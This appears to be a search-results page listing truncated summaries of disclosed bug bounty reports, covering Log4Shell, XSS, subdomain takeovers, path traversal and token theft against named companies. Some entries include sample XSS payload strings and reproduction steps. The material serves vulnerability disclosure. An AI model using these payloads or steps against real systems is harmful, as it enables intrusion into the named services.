15270 matches found
GitLab: Gitlab Pages token theft using service workers
Summary It is possible to steal Gitlab Pages session tokens by intercepting requests to the /auth endpoint on a Pages site using service workers. Attack Flow Setup 1. The attacker creates a private Gitlab Pages site at the root of their user page attacker.gitlab.io, ensuring that the project is...
Shopify: Github base action takeover which is used in `github.com/Shopify/unity-buy-sdk`
Summary: Shopify have a github repository https://github.com/Shopify/unity-buy-sdk In the repository there is a github action, which is used a base action from an external github repository. That github account as not registered on github.com So I was able to takeover the account and host PoC...
X (Formerly Twitter): Discoverability by phone number/email restriction bypass
Summary: By using this vulnerability an attacker can find a twitter account by it's phone number/email even if the user has prohibited this in the privacy options. Description: The vulnerability allows any party without any authentication to obtain a twitter IDwhich is almost equal to getting the...
Krisp: Unsubscripe linkes leaked
@blackxxhat pointed to some users' unsubscribe links that have been indexed in webarchive as the users themselves have posted them in forums, social media, or other websites. We encourage our users not to post URLs from https://url5145.krisp.ai/ because those links may be used to manipulate their...
U.S. Dept Of Defense: ███ ████████ running a vulnerable log4j
Report Description: https://vulners.com/cve/CVE-2021-44228 Impact Probably arbitrary code execution System Hosts ███████ Affected Products and Versions CVE Numbers CVE-2021-44228 Steps to Reproduce 1. Browse to https://██████████/█████████https%3A%2F%2F███%2F 2. Enter a...
Tennessee Valley Authority: No Rate Limit On Forgot Password Page
Vulnerability description not provided...
Cosmos: Race condition in faucet when using starport
Hi team, I and Aditya sent this bug over email on Wed, 29 Dec, 17:45 IST. Later we noticed that security reports are accepted via the HackerOne program. So, I am sending a copy of the bug report here. Summary: We were testing an application and we found a race condition bug in the faucet...
Brave Software: XSS on internal: privileged origin through reader mode
A vulnerability in Brave iOS versions 1.32.3 and higher allowed for XSS attacks on the privileged origin internal://local through the combination of two weaknesses. The first weakness was the exposure of uuidKey through the REFERER header due to the lack of referrer header protection in the...
Monero: DLL hijacking in Monero GUI for Windows 0.17.3.0 would allow an attacker to perform remote command execution
Summary: Monero for windows contains a DLL hijacking vulnerability that allows to get a meterpreter command metasploit remote shell, The moment the victim runs the program it will execute our payload malicious .dll that will give an attacker a meterpreter console. This will allow the attacker...
TikTok: URL Scheme misconfiguration on TikTok for IOS
A misconfigured URL schema on a TikTok iOS endpoint could have resulted in a user being forced to follow other accounts by visiting a malicious website or HTML page. We thank @glassplant for reporting this to our team...
X (Formerly Twitter): Improper santization of edit in list feature at twitter leads to delete any twitter user's list cover photo.
An improper sanitization of the edit list feature at Twitter allowed an attacker to delete any Twitter user's list cover photo. By manipulating the media ID in the request, the attacker could delete the victim's cover photo, violating access controls...
Acronis: SQL injection in https://demor.adr.acronis.com/ via the username parameter
Vulnerability description not provided...
Brave Software: Universal XSS with Playlist feature
A Universal XSS vulnerability was discovered in Brave iOS versions 1.32.3 and higher. The vulnerability was caused by three weaknesses, including the exposure of UserScriptManager.securityToken and UserScriptManager.messageHandlerToken, as well as a UXSS vulnerability in PlaylistHelper through...
U.S. Dept Of Defense: CUI Labelled document out in the open
Hi DoD VDP, I have found a document and each page of it is marked CUI : "Controlled Unclassified Information". According to your standards, this file shouldn't be publicly available on internet. This document was last edited on █████████ 2021. My investigation leads me to think it could have been...
U.S. Dept Of Defense: Arbitrary File Read at ███ via filename parameter
Arbitrary file reads with multiple endpoint on a DoD public facing asset...
Brave Software: New XSS vector in ReaderMode with %READER-TITLE-NONCE%
A new XSS vulnerability was discovered in Brave iOS 1.31.1 and higher, which allowed attackers to execute malicious scripts on ReaderMode pages. The vulnerability was caused by a relaxation of the CSP rule, which allowed scripts with nonce-%READER-TITLE-NONCE% to be executed. Attackers could...
Acronis: Missing brute force protection on login page on www.acronis.com
A missing brute force protection vulnerability was discovered on the login page of www.acronis.com. This allowed attackers to launch brute force attacks on user accounts, potentially leading to unauthorized access...
Kubernetes: Github Account Takeover from Docs page of `kubernetes-csi.github.io`
Report Submission Form Summary: Kubernetes in its docs https://kubernetes-csi.github.io have a drivers list. One of the driver was pointing to an external github account. That github account was not registered on github.com So I was able to takeover the account and host PoC Kubernetes Version: NA...
MTN Group: Information disclosure through django debug mode
Summary: Your domain https://szezvzorilla.mtn.co.sz was disclosing information throught django debug mode enable. Steps To Reproduce: Visit https://szezvzorilla.mtn.co.sz/NONEXISTINGPATH/ You will the information of debugging Supporting Material/References: F1555934 attachment / reference Impact...
JFrog: Impersonation attack via Broken link in "blog-author" page
A social media platform link of "Twitter" on https://jfrog.com/blog-author/john-peterson/ was broken and could've allowed a user to impersonate a reseller and attack / scam your customers. This happened because the account of twitter either deleted or changed their username. I thought I'd report ...
Kubernetes: Broken Domain Link Takeover from kubernetes.io docs
Report Submission Form Summary: Kubernetes docs have Spanish translation available. One of the pages of the Portuguese doc has an external reference to a website . The website is not registered and can be purchased and used to host malicious content. Kubernetes Version: NA Component Version: NA...
Internet Bug Bounty: Buffer overflow in req_parsebody method in lua_request.c
Software Versions ------------------- Ubuntu - 18.04 32-bit Apache 2.4.51 32-bit Description ------------- This bug is present in "reqparsebody" method of modules/lua/luarequest.c file. Below mentioned lines of code cause this bug. cpp ... sizet vlen = 0; ... ... vlen = end - crlf - 8; buffer =...
h1-ctf: Saving Christmas from Grinchy Gods
It was a fun CTF to play had some good learning on thinking of how to approach real world targets and more things we can try while testing any target , some nudges were good and reminded of scenarios of actual microservices are built where these security issues can be present huge shoutouts to Ad...
h1-ctf: The Return of the Grinch
Read the full writeup here: https://github.com/tarifas90/CTF-Writeups-2021/blob/main/hackyholidasy2021.md...
TikTok: Cross site scripting via file upload in subdomain ads.tiktok.com
A file upload XSS cross-site scripting vulnerability was found in TikTok ads ticketing platform. Due to missing checks it was possible to upload .svg files which contained XSS payload. We thank @blubluuu for reporting this to our team and confirming its resolution...
S-Pankki: Email/OTP verification bypass leads to Pre-Account Takeover.
Handled in https://jira.sok.fi/browse/VOIK-6267...
Krisp: Log4j CVE-2021–44228
The researcher's canary token got DNS interaction, which raised a false sense of log4shell vulnerability. $hostName would be exfiltrated if any of the processing servers were vulnerable, but as seen in the video submitted by the researcher just a plain DNS resolving was made...
Node.js: Prototype pollution via console.table properties
Summary: Attacker control of the second properties parameter of console.table may lead to prototype pollution. Description: Due to the formatting logic of the console.table function it is not safe to allow user controlled input to be passed to the properties parameter while simultaneously passing...
Acronis: [forum.acronis.com] JNDI Code Injection due an outdated log4j component
Vulnerability description not provided...
RubyGems: Dependency repository hijacking aka Repo Jacking from GitHub repo rubygems/bundler-site & rubygems/bundler.github.io + bundler.io docs
Dependency repository hijacking aka repo jacking is an obscure supply chain vulnerability, conceptually similar to subdomain takeover. When the linked repository owner changes their username, it becomes immediately available to be re-registered by anyone. This means that any project that linked...
Node.js: Node.js Certificate Verification Bypass via String Injection
This is a report on behalf of Google, who did not want to report through H1. --- Summary Node’s APIs for reporting certificate fields are ambiguous and allow bypassing certificate verification in some circumstances. Details In light of CVE-2021-3712, I’ve been looking at code which misuses...
Ruby on Rails: Subdomain Takeover at https://new.rubyonrails.org/
Disclaimer I know it's OOS but the issue is pretty serious because of the attractive domain name "new.rubyonrails.org" basically anyone could have put malware there. Summary Hi! I discovered that new.rubyonrails.org was pointing to an unclaimed Github Page, making it vulnerable to subdomain...
U.S. Dept Of Defense: Log4Shell: RCE 0-day exploit on █████████
Hi team, log4 shell is recent 0-day exploit it's Java package vulnerable. ██████████ domain is vulnerable Impact RCE System Hosts █████████ Affected Products and Versions CVE Numbers CVE-2021-44228 Steps to Reproduce 1. Go to this url =...
Showmax: Race Condition Vulnerability when creating profiles
Summary:This report describes a Race Condition Vulnerability which allows a user to create more profile as he wish which contradict your business logic, I was only allow to create six profiles on my account but using this bug I was able to create free 30 profiles. Description: There is a race...
Dropbox: Send Fax from Anyone's HelloFax Account Due to Misconfigured Email Validation
The report demonstrates a method of using up HelloFax credits by forging email requests. A fix for the issue has been released and it was applied for existing and new users through an automatic update. An attacker could exploit this vulnerability by entering a victim’s HelloFax line number into a...
Judge.me : Stored XSS in Question edit for product name (bypass #1416672)
Hi @judgeme! Step to reproduce: 1. Log in to your shopify account and create product with name img src=x onerror=promptdocument.domain img src=x onerror=promptdocument.domain 2. Go to our store and write question to our product with name img src=x onerror=promptdocument.domain img src=x...
Judge.me : Log4j RCE on https://judge.me/reviews
Summary: CVE-2021-44228, also named Log4Shell or LogJam, is a Remote Code Execution RCE class vulnerability. If attackers manage to exploit it on one of the servers, they gain the ability to execute arbitrary code and potentially take full control of the system. What makes CVE-2021-44228 especial...
MTN Group: path traversal vulnerability in Grafana 8.x allows " local file read "
Hi team, I've found a path traversal issue in the Grafana instances hosted on the MTN platforms. With the path traversal it's possible for an unauthenticated user to read arbitrary files on the server. This IP " 41.242.91.22 " Domain Name " mtn.com.gn " is for MTN Group F1545670 F1545682 Steps To...
Reddit: No rate limit on password reset leads to email enumeration at gateway-production.dubsmash.com
Summary: i found brute force on gateway-production.dubsmash.com . find valid usersnames and emails no rate limit Impact: attacker could collect all usernames and valid emails through brute force on forget password Steps To Reproduce: open gateway-production.dubsmash.com and forget email and enter...
Judge.me : stored XSS on AliExpress Review Importer/Products when delete product
Hi @judgeme! code Step to reproduce: 1. Go to Shopify admin and create product with name "" img src=x onerror=prompt 2. Go to AliExpress Review Importer/Products and delete our product with name " img src=x onerror=promptdocument.domain F1544890 3. Xss work= P.S. Poc wideo attach F1544893 Impact...
MTN Group: Remote code injection in Log4j on https://mymtn.mtncongo.net - CVE-2021-44228
The website https://mymtn.mtncongo.net was vulnerable to remote code injection due to the CVE-2021-44228 vulnerability in the Log4j library. This critical vulnerability allowed for remote command execution...
MTN Group: Remote code injection in Log4j on http://mtn1app.mtncameroon.net - CVE-2021-44228
The vulnerability CVE-2021-44228, a remote code injection flaw in Log4j, was discovered on the website http://mtn1app.mtncameroon.net. The vulnerability was confirmed to be present on the ports 8080 and 8443 of the website. The issue was demonstrated by retrieving the hostname of the affected...
Acronis: [CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day
Summary The website at nps.acronis.com is vulnerable to CVE-2021-44228 Steps To Reproduce I used this script to find this. It spins up an interact-sh server to receive the callback and send the payload in the query string and about 30 diffent headers. You can reproduce manually with curl and...
FetLife: Able to access private picture/video/writing when requesting for their JSON response
Description Endpoint https://fetlife.com/users/user-id/pictures/pic-id has 2 types of responses, HTML and JSON. The type of response depends on Accept header of request it get. If request contains Accept: application/json, then it will return JSON response. Other than that, it returns HTML...
Glassdoor: Web Cache Poisoning leads to Stored XSS
@bombon reported to us a web cache poisoning issue that led to caching of gdTokenAnti-CSRF token across different Glassdoor pages and in some instances could be chained to perform XSS by caching the XSS payload. This has now been resolved using CF web cache armor and cache-control headers...
FetLife: Able to detect if a user is FetLife supporter although this user hides their support badge in fetlife.com/conversations/{id} JSON response
UserA is a FetLife supporter, he also hides his support badge in his account privacy setting so that people don't know he is a supporter. However, UserB can start a conversation with userA, and by looking at issupporter field in JSON response of their conversation . UserB knows that UserA is a...
U.S. Dept Of Defense: ██████████ running a vulnerable log4j
Description: https://vulners.com/cve/CVE-2021-44228 Impact Probably arbitrary code execution System Hosts ████████ Affected Products and Versions CVE Numbers CVE-2021-44228 Steps to Reproduce 1. Browse to https://████████/███████https%3A%2F%2F█████████%2F 2. Enter a...
U.S. Dept Of Defense: Wrong settings in ADF Faces leads to information disclosure
Hello, Team. Found some interesting links which leads to information disclosure in █████ Link 1: █████████████ Link 2: ██████████████████ Link 3: █████████████ Every link goes through https://██████to https://████ For Link 3 is possible to change data in the fields: First Name, Last Name, Phone...
Yelp: Fraudulent claim of business.
Vulnerability description not provided...
Shopify: Direct Access To admin Dashboard
This issue affect two Subdomains, https://data-stories-website.shopifycloud.com/admin.php and https://datastories.shopify.com/admin.php Summary: Hi Team, When Link to https://datastories.shopify.com/admin or https://data-stories-website.shopifycloud.com/admin the subdomain redirect you to...